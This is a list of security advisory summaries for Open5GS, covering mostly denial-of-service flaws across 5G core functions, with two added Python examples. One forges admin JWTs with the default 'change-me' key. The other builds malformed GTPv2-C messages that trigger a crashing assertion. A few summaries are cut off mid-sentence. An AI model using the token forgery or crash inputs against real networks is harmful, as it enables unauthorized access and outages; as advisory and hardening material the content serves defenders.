Denial of service in Open5GS versions up to 2.7.7 allows authenticated remote attackers to crash the Network Repository Function (NRF) component via malformed target-plmn-list parameters. The vulnerability targets a parsing function in the Service-Based Interface (SBI) library and has publicly available exploit code (GitHub issue #4458). CVSS 4.3 reflects low severity, but the vendor has not responded to early disclosure attempts, leaving no confirmed patch timeline. EPSS and KEV data unavailable - exploitation likelihood beyond POC unknown.
Denial of service in Open5GS up to version 2.7.7 allows authenticated remote attackers to crash the NRF component by manipulating the hnrf-uri argument passed to the yuarel_parse function in /lib/sbi/conv.c. The vulnerability has a publicly available exploit and low CVSS score (4.3) due to authentication requirement and limited scope, but affects a critical 5G network function with potential operational impact.
Denial of service in Open5GS NRF component up to version 2.7.7 allows remote authenticated attackers to exhaust the nf_service memory pool via the ogs_nnrf_nfm_handle_nf_profile function, causing the process to abort via failed assertion. Publicly available exploit code exists, and a vendor patch is available but awaits acceptance into the main branch.
Denial of service in Open5GS through version 2.7.7 allows authenticated remote attackers to crash the Service Management Function (SMF) by manipulating the smf_nsmf_handle_update_data_in_vsmf function in nsmf-handler.c. Publicly available exploit code exists, and the project maintainers have not yet responded to the early disclosure notification despite awareness of the issue.
Denial of service in Open5GS up to version 2.7.7 allows authenticated remote attackers to crash the Session Management Function (SMF) by manipulating the qosFlowProfile argument in the smf_nsmf_handle_update_data_in_vsmf function. Publicly available exploit code exists, and the vulnerability affects the 5G core network's ability to manage quality-of-service parameters, though the project maintainers have not yet responded to early disclosure.
Denial of service in Open5GS SMF (Session Management Function) via crafted PDU Session Modification messages allows remote authenticated attackers to trigger unvalidated parameter processing in gsm_handle_pdu_session_modification_qos_flow_descriptions(), causing service disruption. The vulnerability stems from insufficient pre-validation of QoS flow parameter identifiers and bitrate units before state mutation, potentially leaving the SMF in an inconsistent state. Publicly available exploit code exists, and a fix awaits upstream acceptance in PR #4513.
Denial of service in Open5GS up to version 2.7.7 allows authenticated remote attackers to crash the Session Management Function (SMF) via manipulation of QoS rule parsing in the ogs_nas_parse_qos_rules function. The vulnerability has a low CVSS score of 2.1 but public exploit code is available; however, exploitation requires prior authentication and causes only availability impact without confidentiality or integrity compromise.
Denial of service vulnerability in Open5GS up to version 2.7.7 affects the SMF (Session Management Function) component's smf_nsmf_handle_create_sm_context function, allowing authenticated remote attackers to crash or degrade the 5G core network service through malformed session context creation requests. Public exploit code exists and the vulnerability has low real-world severity (CVSS 2.1) due to requirement for authenticated access and availability impact only, though active 5G infrastructure targeting remains a concern given the critical nature of SMF in telecom deployments.
Denial of service in Open5GS up to version 2.7.7 affects the SMF component's OpenAPI_list_create function, allowing authenticated remote attackers to cause service unavailability through resource manipulation. The vulnerability has low to moderate severity (CVSS 4.3) with publicly disclosed proof-of-concept code, though the vendor has not yet responded to early disclosure notification.
Remote authenticated denial of service in Open5GS up to version 2.7.7 affects the SMF (Session Management Function) component, specifically in the smf_nsmf_handle_created_data_in_vsmf function. An authenticated attacker can remotely trigger a denial of service condition by sending crafted requests. Public exploit code is available (CVE-2026-8267 GitHub issue #4448), though the vendor has not yet released a patched version despite early notification.
Denial of service in Open5GS up to version 2.7.7 allows authenticated remote attackers to crash the Service Management Function (SMF) via manipulation of the PDU session establishment acceptance function, resulting in service unavailability. The CVSS score of 4.3 reflects low severity due to authentication requirements and availability-only impact, though publicly available exploit code exists and the vulnerability has been reported to the project without acknowledged response.
Null pointer dereference in Open5GS Session Management Function (SMF) up to version 2.7.7 allows authenticated remote attackers to cause denial of service by manipulating the smf_nsmf_handle_create_data_in_hsmf function. Publicly available exploit code exists, and the project has been notified but has not yet released a patch.
Denial of service in Open5GS up to version 2.7.7 allows authenticated remote attackers to crash the Session Management Function (SMF) component via manipulation of the update_authorized_pcc_rule_and_qos function in the Policy and Charging Control (PCC) handler. The vulnerability has a CVSS score of 2.1 with low availability impact; publicly available exploit code exists, and the project maintainers have not yet responded to early disclosure.
Denial of service in Open5GS up to version 2.7.7 via the smf_n4_build_qos_flow_to_modify_list function in the SMF (Session Management Function) component allows remote authenticated attackers to crash the service with low attack complexity. The vulnerability has been publicly disclosed with exploit code available; the vendor was notified early but has not yet released a fix.
Denial of service vulnerability in Open5GS up to version 2.7.7 allows authenticated remote attackers to crash the Session Management Function (SMF) component via improper handling in the update_authorized_pcc_rule_and_qos function. The vulnerability has a publicly available exploit and a moderate CVSS score (4.3) but is limited to authenticated access and results in availability impact only. The vendor has not yet released a patch despite early notification through a GitHub issue.
Denial of service in Open5GS up to version 2.7.7 allows authenticated remote attackers to crash the Session Management Function (SMF) component via manipulation of the update_authorized_pcc_rule_and_qos function in npcf-handler.c. Publicly available exploit code exists, and the vendor has not released a patch despite early notification through issue tracking.
Denial of service vulnerability in Open5GS up to version 2.7.7 allows remote unauthenticated attackers to crash the service by triggering improper exception handling in the ogs_pcc_rule_install_flow_from_media function within the PCC rule processing library. Publicly available exploit code exists, and the project maintainers have not responded to the early notification despite issue tracking.
Denial of service in Open5GS up to version 2.7.7 allows remote unauthenticated attackers to crash the Policy Control Function (PCF) by manipulating the SmPolicyContextData.ipv6AddressPrefix parameter in the pcf_sess_set_ipv6prefix function. The vulnerability has publicly available exploit code and was disclosed despite vendor non-responsiveness, making it a known attack vector against 5G service provider infrastructure.
Denial of service in Open5GS up to version 2.7.7 via manipulation of the pcf_sess_sbi_discover_and_send function in the sm-policies endpoint allows remote unauthenticated attackers to disrupt service availability. Publicly available exploit code exists, and the upstream project has not yet issued a patch despite early notification via issue report.
Remote denial of service in Open5GS up to version 2.7.7 affects the sm-policies endpoint's pcf_nbsf_management_handle_register function, allowing unauthenticated network attackers to trigger a crash or service disruption with low attack complexity. Publicly available exploit code exists and the vendor was notified early but has not released a fix.
Denial of service in Open5GS up to version 2.7.7 allows remote unauthenticated attackers to crash the Policy Control Function (PCF) service by sending crafted requests to the delete endpoint in the SM policy control handler (pcf_npcf_smpolicycontrol_handle_delete). The vulnerability has a publicly available proof of concept and impacts the availability of 5G network policy enforcement, though the vendor has not yet released a patch despite early notification.
Out-of-bounds read in Open5GS up to version 2.7.7 allows remote attackers to trigger information disclosure via manipulation of the ogs_sbi_client_send_via_scp_or_sepp function in lib/sbi/client.c during Service-Based Interface (SBI) communication. The vulnerability exploits improper bounds checking when extracting paths from URIs, affecting the Network Function (NF) component. CVSS 6.9 (network-accessible, low complexity, no privileges required) with availability impact. Upstream patch commit d5bc487fcf9ea87d2b03f2ef95123af344773bfb available.
Denial of service in Open5GS User Plane Function (UPF) up to version 2.7.7 allows remote, unauthenticated attackers to exhaust server resources through manipulation of GTPv1-U packet handling in the _gtpv1_u_recv_cb function. The vulnerability enables resource consumption attacks against 5G core network infrastructure without requiring authentication or user interaction. Vendor notification occurred via GitHub issue #4492 but has not received developer response or a released patch.
Denial of service in Open5GS up to version 2.7.7 affects the NSSF component's ogs_sbi_discovery_option_add_snssais function, allowing authenticated remote attackers to crash the service via a network request. The vulnerability has been publicly disclosed with exploit code available on GitHub, though the vendor has not yet responded to early notification.
Denial of service vulnerability in Open5GS up to version 2.7.7 affects the NSSF component's service discovery function, allowing remote authenticated attackers to cause availability impact through manipulation of the ogs_sbi_discovery_option_add_service_names function. Public exploit code exists and the vulnerability carries low CVSS score (2.1) reflecting limited impact scope, though the project has not yet responded to early notification.
Denial of service in Open5GS up to version 2.7.7 allows authenticated remote attackers to crash the NSSF (Network Slice Selection Function) component via a crafted PLMN list in the SBI (Service Based Interface) parser. The vulnerability exists in the ogs_sbi_parse_plmn_list function within /lib/sbi/conv.c and has been publicly disclosed with exploit code available; the vendor has not yet released a patch despite early notification.
Denial of service in Open5GS up to version 2.7.7 allows authenticated remote attackers to manipulate the NSSF network selection function via the nssf_nnrf_nsselection_handle_get_from_amf_or_vnssf handler in /src/nssf/nnssf-handler.c, causing service unavailability. Public exploit code exists and the vulnerability has been reported to the project, though no patch has been released as of analysis time.
Denial of service in Open5GS up to version 2.7.7 affects the NSSF component's stream identification function in the nghttp2-server library. Local authenticated attackers can manipulate the ogs_sbi_stream_find_by_id function to cause service unavailability. Publicly available exploit code exists, though the vendor has not yet responded to early disclosure notification.
Denial of service in Open5GS up to version 2.7.7 affects the AMF 3GPP access endpoint handler (udm_nudm_uecm_handle_amf_registration_update function), allowing authenticated remote attackers to crash the UDM service via malformed registration update messages. Publicly available exploit code exists, and the vendor was notified early but has not released a patch as of the analysis date.
Denial of service in Open5GS up to version 2.7.7 affects the udm_state_operational function in the smf-registrations endpoint, allowing authenticated remote attackers to manipulate the function and cause service unavailability. The vulnerability has publicly available exploit code and carries a low CVSS score of 2.1 due to required authentication and limited availability impact, though the project has not yet responded to early disclosure.
Denial of service in Open5GS up to version 2.7.7 affects the authentication-subscription endpoint handler, allowing authenticated remote attackers to manipulate the udm_nudr_dr_handle_subscription_authentication function and cause service unavailability. Public exploit code exists and the vulnerability has been reported to the project without a confirmed vendor response or patch release.
Denial of service in Open5GS UDR component up to version 2.7.7 allows authenticated remote attackers to crash the subscription data service by manipulating the supi_id argument to the ogs_dbi_subscription_data function. Publicly available exploit code exists, and the vendor has been notified via issue report but has not yet released a patch.
Denial of service in Open5GS UDR component (versions up to 2.7.7) via a malformed pei argument in the udr_nudr_dr_handle_subscription_context function allows authenticated remote attackers to crash the User Data Repository service with low complexity. Publicly available exploit code exists; the vendor has not responded to early notification.
Denial of service in Open5GS versions up to 2.7.7 allows authenticated remote attackers to crash the AMF (Access and Mobility Management Function) component by exploiting improper error handling in the gmm_handle_service_request function. The vulnerability requires low-privilege authentication to trigger and results in service unavailability. A public exploit has been disclosed via GitHub issue tracker, though the vendor has not yet released a patch despite early notification.
Denial of service in Open5GS AMF (Access and Mobility Management Function) up to version 2.7.6 allows authenticated remote attackers to cause service unavailability by sending crafted registration requests with manipulated reg_type arguments. The vulnerability exists in the GMM (Mobility Management) handler due to insufficient validation of registration type values, potentially triggering null pointer dereferences or assertion failures. Vendor-released patch version 2.7.7 is available.
Denial of service in Open5GS AMF component up to version 2.7.7 allows authenticated remote attackers to trigger resource exhaustion via improper handling of PDU session context update messages in the amf_nsmf_pdusession_handle_update_sm_context function. The vulnerability has a low CVSS score (2.1) but publicly available exploit code exists; however, exploitation requires prior authentication to the 5G network, significantly limiting real-world attack surface.
Denial of service in Open5GS up to version 2.7.7 affects the AMF (Access and Mobility Management Function) component, specifically the ogs_id_get_value function in nudm-handler.c, allowing remote authenticated attackers to cause service unavailability. Publicly available exploit code exists, and the vulnerability has been reported to the project via GitHub issue #4405 without vendor acknowledgment or patch release at time of analysis.
Denial of service in Open5GS up to version 2.7.7 allows authenticated remote attackers to crash the AMF (Access and Mobility Management Function) component via manipulation of the amf_nudm_sdm_handle_provisioned function in the NUDM handler. The vulnerability has publicly available exploit code and affects the authentication and mobility management core of 5G networks, requiring valid credentials to trigger but resulting in service unavailability. Public disclosure has occurred without vendor remediation at the time of analysis.
Denial of service in Open5GS up to version 2.7.7 allows authenticated remote attackers to crash the BSF (Binding Support Function) component by manipulating the ipv6Prefix argument in the bsf_sess_find_by_ipv6prefix function. The vulnerability has a low CVSS score of 2.1 due to requiring authentication and causing only availability impact, but publicly available exploit code exists and the vendor has not yet responded to early disclosure.
Denial of service in Open5GS up to version 2.7.7 allows remote unauthenticated attackers to crash the BSF (Binding Support Function) service by manipulating the ipv4Addr parameter in the /nbsf-management/v1/pcfBindings endpoint. The vulnerability has publicly available exploit code and affects a core 5G network function, creating operational risk for mobile networks relying on this open-source implementation.
Denial of service in Open5GS 2.7.6 via malformed CCA (Credit-Control-Answer) messages in the SMF (Session Management Function) component allows remote attackers to crash the service without authentication. The vulnerability affects the smf_gx_cca_cb, smf_gy_cca_cb, and smf_s6b functions in the CCA Message Handler, with publicly available exploit code demonstrating the attack despite high complexity requirements. CVSS 6.3 reflects the availability impact and remote attack vector, though exploitation requires crafted network conditions.
Denial of service in Open5GS through version 2.7.6 affects the CCA Handler component's callback functions, allowing unauthenticated remote attackers to crash the service. Public exploit code is available for this vulnerability. Upgrading to version 2.7.7 resolves the issue.
Open5GS 2.7.6 is vulnerable to denial of service through improper handling of S11 session response messages in the MME component, allowing remote unauthenticated attackers to crash the service. Public exploit code exists for this vulnerability, and the vendor has not yet provided a patch despite early notification.
Open5GS versions up to 2.7.6 are vulnerable to a denial of service condition in the SMF component's PDP context request handler, which can be triggered remotely without authentication. An attacker can exploit this reachable assertion flaw to crash the service, and public exploit code is currently available. No patch has been released by the project despite early notification of the issue.
Memory corruption in Open5GS up to version 2.7.6 allows remote attackers to cause denial of service through manipulation of the MME component's esm-build.c file. Public exploit code exists for this vulnerability, and the Open5GS project has not yet released a patch despite early notification.
Memory corruption in Open5GS versions up to 2.7.6 allows remote attackers to trigger a denial of service condition by manipulating the SGW-C session creation handler, with public exploit code already available. The vulnerability requires no authentication or user interaction and currently lacks a vendor patch, leaving affected deployments vulnerable to remote availability attacks.
Open5GS versions up to 2.7.6 are vulnerable to a denial of service attack in the SMF component's TFT parsing function when a crafted packet manipulates the traffic filter content length parameter. An unauthenticated remote attacker can trigger this flaw to crash the service, and public exploit code exists with no patch currently available.
Open5GS versions up to 2.7.6 suffer from a null pointer dereference in the PGW S5U Address Handler component that can be triggered remotely without authentication, resulting in denial of service. Public exploit code exists for this vulnerability, and administrators should apply the available patch immediately.
A security flaw has been discovered in Open5GS up to 2.7.6. Affected by this vulnerability is the function hss_ogs_diam_cx_mar_cb of the file src/hss/hss-cx-path.c of the component VoLTE Cx-Test. [CVSS 7.3 HIGH]
Remote denial of service in Open5GS up to version 2.7.6 allows unauthenticated attackers to trigger a reachable assertion in the SGWC component by manipulating PDR arguments in the sgwc_tunnel_add function. Public exploit code exists for this vulnerability, and no patch is currently available despite reports indicating a fix is planned.
Open5GS versions up to 2.7.6 contain a reachable assertion vulnerability in the CreateBearerRequest handler that allows unauthenticated remote attackers to trigger a denial of service condition. Public exploit code exists for this vulnerability, and no patch is currently available. The impact is limited to service availability, with a CVSS score of 5.3.
Open5GS versions up to 2.7.6 contain a reachable assertion vulnerability in the SGWC S11 handler that can be triggered remotely without authentication to cause a denial of service. Public exploit code exists for this vulnerability, and although the issue is reported as already fixed upstream, no patch is yet available for affected deployments.
Denial of service in Open5GS up to version 2.7.6 allows remote attackers to crash the SGWC service by manipulating the Modify Bearer Request handler in s11-handler.c. Public exploit code exists for this vulnerability and no patch is currently available. Organizations running affected versions should apply updates as they become available and consider network-level mitigations to restrict access to the S11 interface.
Remote denial of service in Open5GS up to version 2.7.5 affects the SGWC component's TEID-to-IP conversion function, allowing unauthenticated attackers to crash the service over the network. Public exploit code exists for this vulnerability, and while a fix has been developed, no official patch is currently available for affected deployments.
Remote denial of service in Open5GS up to version 2.7.6 affects the SGWC component's bearer response handler, allowing unauthenticated attackers to crash the service over the network. Public exploit code exists for this vulnerability, though a patch (commit b19cf6a) is available to resolve it.
Remote denial of service in Open5GS up to version 2.7.6 allows unauthenticated attackers to crash the SGWC component by manipulating bearer resource failure indication messages. Public exploit code exists for this vulnerability, and a patch is available in commit 69b53add90a9479d7960b822fc60601d659c328b.
Open5gs WebUI authentication can be bypassed by attackers who exploit the default hardcoded JWT signing key ("change-me") that is used when the JWT_SECRET_KEY environment variable is not configured. An attacker can forge valid JWT tokens to gain unauthorized access to the WebUI with limited confidentiality and integrity impacts. A patch is available to remediate this vulnerability by enforcing proper key configuration or using secure defaults.
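The forgery path described above, as an added example in Python (constructed for this page; it is not the Open5GS WebUI's own code, which is JavaScript): it signs an HS256 token with the default secret, shows the silent fallback-to-default pattern beside a startup check that refuses it, and includes a check a practitioner can run against a token issued by a deployment they are authorized to test. The only fact taken from the advisory is the default value "change-me"; the HS256 algorithm, the claim names (`sub`, `role`), the minimum key length and the function names are assumptions for illustration.

```python
import base64
import hashlib
import hmac
import json
from typing import Dict, Optional

DEFAULT_SECRET = "change-me"   # the insecure default named in the advisory
MIN_SECRET_LEN = 32            # assumed policy for this example, not a project setting


def _b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def _b64url_decode(s: str) -> bytes:
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def sign_hs256(payload: Dict, secret: str) -> str:
    """Build a compact JWT signed with HMAC-SHA256. With the default
    secret this is exactly the forgery an attacker performs."""
    def enc(obj) -> str:
        return _b64url(json.dumps(obj, separators=(",", ":")).encode())
    header = {"alg": "HS256", "typ": "JWT"}
    signing_input = enc(header) + "." + enc(payload)
    sig = hmac.new(secret.encode(), signing_input.encode(), hashlib.sha256).digest()
    return signing_input + "." + _b64url(sig)


def verify_hs256(token: str, secret: str) -> Optional[Dict]:
    """Return the payload if the signature checks out under secret, else None."""
    parts = token.split(".")
    if len(parts) != 3:
        return None
    h, p, s = parts
    try:
        header = json.loads(_b64url_decode(h))
        sig = _b64url_decode(s)
    except ValueError:
        return None
    if header.get("alg") != "HS256":   # pin the algorithm; never trust alg from the token
        return None
    expected = hmac.new(secret.encode(), f"{h}.{p}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, sig):
        return None
    return json.loads(_b64url_decode(p))


def is_forgeable(token: str) -> bool:
    """Check a token issued by a deployment: if it verifies under the
    published default, anyone can mint their own."""
    return verify_hs256(token, DEFAULT_SECRET) is not None


def load_secret_insecure(env: Dict[str, str]) -> str:
    """The pattern the advisory describes: silent fallback to a hardcoded key."""
    return env.get("JWT_SECRET_KEY", DEFAULT_SECRET)


def load_secret_hardened(env: Dict[str, str]) -> str:
    """Fail closed at startup instead of falling back to the default."""
    secret = env.get("JWT_SECRET_KEY", "")
    if secret == DEFAULT_SECRET or len(secret) < MIN_SECRET_LEN:
        raise RuntimeError("JWT_SECRET_KEY unset, default, or too short; refusing to start")
    return secret


def hardened_rejects(env: Dict[str, str]) -> bool:
    """True if the hardened loader refuses the given environment."""
    try:
        load_secret_hardened(env)
        return False
    except RuntimeError:
        return True


if __name__ == "__main__":
    import os
    # With JWT_SECRET_KEY unset this mints a token the vulnerable WebUI accepts.
    forged = sign_hs256({"sub": "admin", "role": "admin"}, load_secret_insecure(os.environ))
    print("forged token:", forged)
    print("verifies under default secret:", is_forgeable(forged))
```

Run `is_forgeable()` on a token the WebUI handed out after login: if it verifies under "change-me", the instance is running with the unconfigured key and every token it issues can be reproduced by anyone. The hardened loader turns the missing configuration into a startup failure, which is the behaviour the advisory's fix describes.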
Open5GS up to 2.7.6 contains a flaw in the function sgwc_s11_handle_downlink_data_notification_ack of the file src/sgwc/s11-handler.c, in the sgwc component. [CVSS 5.3 MEDIUM]
Open5GS up to 2.7.5 contains a flaw in unspecified processing of the Timer Handler component. [CVSS 5.3 MEDIUM]
Open5GS up to 2.7.5 contains a flaw in the function sgwc_bearer_add of the file src/sgwc/context.c. [CVSS 5.3 MEDIUM]
Open5GS up to 2.7.6 contains a flaw in the function sgwc_s11_handle_create_indirect_data_forwarding_tunnel_request of the file /src/sgwc/s11-handler.c. [CVSS 5.3 MEDIUM]
Open5GS up to 2.7.6 contains a flaw in the function sgwc_s5c_handle_create_session_response of the file src/sgwc/s5c-handler.c. [CVSS 5.3 MEDIUM]
Open5GS up to 2.7.6 contains a flaw in unspecified functionality of the GTPv2 Bearer Response Handler component. [CVSS 5.3 MEDIUM]
Open5GS up to 2.7.6 contains a flaw in the function sgwc_s5c_handle_create_session_response of the file src/sgwc/s5c-handler.c, in the GTPv2-C Flow Handler component. [CVSS 3.3 LOW]
Open5GS up to 2.7.6 contains a flaw in the function ogs_gtp2_parse_bearer_qos in the library lib/gtp/v2/types.c, in the Bearer QoS IE Length Handler component. [CVSS 3.3 LOW]
Open5GS up to 2.7.6 contains a flaw in the function sgwc_s11_handle_create_session_request of the file src/sgwc/s11-handler.c, in the GTPv2-C F-TEID Handler component. [CVSS 3.3 LOW]
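Many of the SGW-C entries above are reachable assertions (CWE-617) in GTPv2-C message handlers, including one on the Bearer QoS IE length. The following added Python example (constructed for this page; not Open5GS code, whose handlers are C) shows the pattern generically: a decoder that asserts on a peer-supplied IE length aborts the whole process on one malformed message, while a decoder that checks the length and rejects the message keeps the service running. The IE header layout (type, 16-bit length, instance) and the 22-octet Bearer QoS IE follow 3GPP TS 29.274; the sample messages are constructed, and the handler and helper names are invented for the example.

```python
import struct
from typing import Dict, List, Optional, Tuple

# GTPv2-C IE header (TS 29.274 8.2): type (1 octet), length (2 octets),
# 4 spare bits + 4-bit instance (1 octet). The length excludes the header.
IE_HEADER = struct.Struct("!BHB")
IE_BEARER_QOS = 80          # Bearer Level QoS IE type
BEARER_QOS_LEN = 22         # fixed payload length per TS 29.274 8.15


def build_ie(ie_type: int, instance: int, value: bytes) -> bytes:
    """Encode one IE; used only to construct the sample messages below."""
    return IE_HEADER.pack(ie_type, len(value), instance & 0x0F) + value


def parse_ies(body: bytes) -> List[Tuple[int, int, bytes]]:
    """Split a GTPv2-C message body into (type, instance, value) triples.
    Broken framing raises ValueError; the caller decides what to do."""
    ies = []
    off = 0
    while off < len(body):
        if len(body) - off < IE_HEADER.size:
            raise ValueError("truncated IE header")
        ie_type, ie_len, inst = IE_HEADER.unpack_from(body, off)
        off += IE_HEADER.size
        if ie_len > len(body) - off:
            raise ValueError("IE length runs past end of message")
        ies.append((ie_type, inst & 0x0F, body[off:off + ie_len]))
        off += ie_len
    return ies


def _decode_qos_fields(v: bytes) -> Dict[str, int]:
    # Octet 1: spare | PCI | PL (4 bits) | spare | PVI; octet 2: QCI;
    # then four 40-bit bitrates (MBR UL/DL, GBR UL/DL) in kbps.
    flags = v[0]
    return {
        "pci": (flags >> 6) & 1,
        "pl": (flags >> 2) & 0x0F,
        "pvi": flags & 1,
        "qci": v[1],
        "mbr_ul": int.from_bytes(v[2:7], "big"),
        "mbr_dl": int.from_bytes(v[7:12], "big"),
        "gbr_ul": int.from_bytes(v[12:17], "big"),
        "gbr_dl": int.from_bytes(v[17:22], "big"),
    }


def decode_bearer_qos_asserting(value: bytes) -> Dict[str, int]:
    """Vulnerable pattern: an assertion guards peer-controlled input, so a
    short IE from an unauthenticated GTP-C peer aborts the whole process."""
    assert len(value) == BEARER_QOS_LEN, "Bearer QoS IE length"
    return _decode_qos_fields(value)


def decode_bearer_qos_checked(value: bytes) -> Optional[Dict[str, int]]:
    """Hardened pattern: validate and reject the message, never abort."""
    if len(value) != BEARER_QOS_LEN:
        return None
    return _decode_qos_fields(value)


def handle_create_bearer(body: bytes, decoder) -> Tuple[str, Optional[Dict[str, int]]]:
    """Hypothetical handler: locate the Bearer QoS IE and decode it with the
    given decoder. Returns ("ok", qos) or ("rejected", None)."""
    try:
        ies = parse_ies(body)
    except ValueError:
        return ("rejected", None)
    for ie_type, _inst, value in ies:
        if ie_type == IE_BEARER_QOS:
            qos = decoder(value)
            return ("ok", qos) if qos is not None else ("rejected", None)
    return ("rejected", None)


def crashes(body: bytes) -> bool:
    """True if the asserting handler would abort (AssertionError) on body."""
    try:
        handle_create_bearer(body, decode_bearer_qos_asserting)
        return False
    except AssertionError:
        return True


# Constructed sample messages (not captured traffic).
GOOD_QOS = (bytes([0x49, 9])            # PCI=1, PL=2, PVI=1; QCI 9
            + (1_000_000).to_bytes(5, "big") + (2_000_000).to_bytes(5, "big")
            + (0).to_bytes(5, "big") + (0).to_bytes(5, "big"))
GOOD_MSG = build_ie(IE_BEARER_QOS, 0, GOOD_QOS)
SHORT_MSG = build_ie(IE_BEARER_QOS, 0, GOOD_QOS[:10])   # well-framed, but 10-octet QoS
TRUNCATED_MSG = GOOD_MSG[:-4]                             # length field exceeds message

if __name__ == "__main__":
    print(handle_create_bearer(GOOD_MSG, decode_bearer_qos_checked))
    print(handle_create_bearer(SHORT_MSG, decode_bearer_qos_checked))
    print("asserting handler aborts on short IE:", crashes(SHORT_MSG))
```

The distinction that matters for availability is between the two malformed inputs: the framing check in `parse_ies` catches a length field that overruns the message, but a well-framed IE whose payload is simply the wrong size reaches the decoder, and that is where an assertion turns a bad packet into a process exit. In a C code base the equivalent of `assert` on message content should be an error return that drops the message and, where the protocol defines one, sends a cause value back.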
Improper initialization in the PFCP handler function ogs_pfcp_handle_create_pdr in Open5GS up to version 2.7.5 allows remote attackers to trigger information disclosure, with high attack complexity. A public proof-of-concept exists, but the very low EPSS score (0.15%) indicates minimal real-world exploitation probability. CVSS 2.9 reflects the limited technical impact (low confidentiality impact only); the high complexity and resource requirements make practical attacks difficult.
Reachable assertion in Open5GS up to version 2.7.6 affects the PFCP context management functions (PDR, FAR, URR, QER) in lib/pfcp/context.c, allowing remote attackers to trigger a denial of service condition via crafted PFCP messages. The vulnerability requires high attack complexity and has low availability impact, but publicly available exploit code exists. CVSS 2.9 and EPSS 0.14% indicate low real-world exploitation probability despite the public PoC.
Null pointer dereference in Open5GS up to version 2.7.5 allows remote authenticated attackers to cause denial of service by sending manipulated PFCP (Packet Forwarding Control Protocol) packets that trigger improper handling in the FAR-ID handler component. The vulnerability requires high attack complexity and authenticated access, which limits real-world exploitation despite publicly available proof-of-concept code; the low CVSS score of 1.3 reflects the restricted impact scope.
In Open5GS 2.7.6, the AMF crashes when it receives an abnormal NGSetupRequest message, resulting in denial of service. Rated high severity (CVSS 7.5), the vulnerability is remotely exploitable with no authentication required and low attack complexity. This uncontrolled resource consumption flaw could allow attackers to cause denial of service by exhausting system resources.
Open5GS v2.7.5, prior to commit 67ba7f92bbd7a378954895d96d9d7b05d5b64615, is vulnerable to a NULL pointer dereference when a multipart/related HTTP POST request with an empty HTTP body is sent to the. Rated medium severity (CVSS 4.0), the vulnerability requires no authentication and has low attack complexity. Public exploit code is available.
An issue in Open5GS v2.7.2 and before allows a remote attacker to cause a denial of service via a crafted Create Session Request message to the SMF (PGW-C), using the IP address of a legitimate UE in. Rated high severity (CVSS 7.5), the vulnerability is remotely exploitable with no authentication required and low attack complexity. Public exploit code is available and no vendor patch is available.
Assertion failure in function ngap_build_downlink_nas_transport in file src/amf/ngap-build.c, the Access and Mobility Management Function (AMF) component, in Open5GS through 2.7.5 allowing attackers to. Rated high severity (CVSS 7.5), the vulnerability is remotely exploitable with no authentication required and low attack complexity. Public exploit code is available.
A security flaw has been discovered in Open5GS up to 2.7.5. Rated medium severity (CVSS 5.5), the vulnerability is remotely exploitable with no authentication required and low attack complexity. Public exploit code is available.
A vulnerability was determined in Open5GS up to 2.7.5. Rated medium severity (CVSS 5.5), the vulnerability is remotely exploitable with no authentication required and low attack complexity. Public exploit code is available.
A vulnerability was found in Open5GS up to 2.7.5. Rated medium severity (CVSS 5.5), the vulnerability is remotely exploitable with no authentication required and low attack complexity. Public exploit code is available.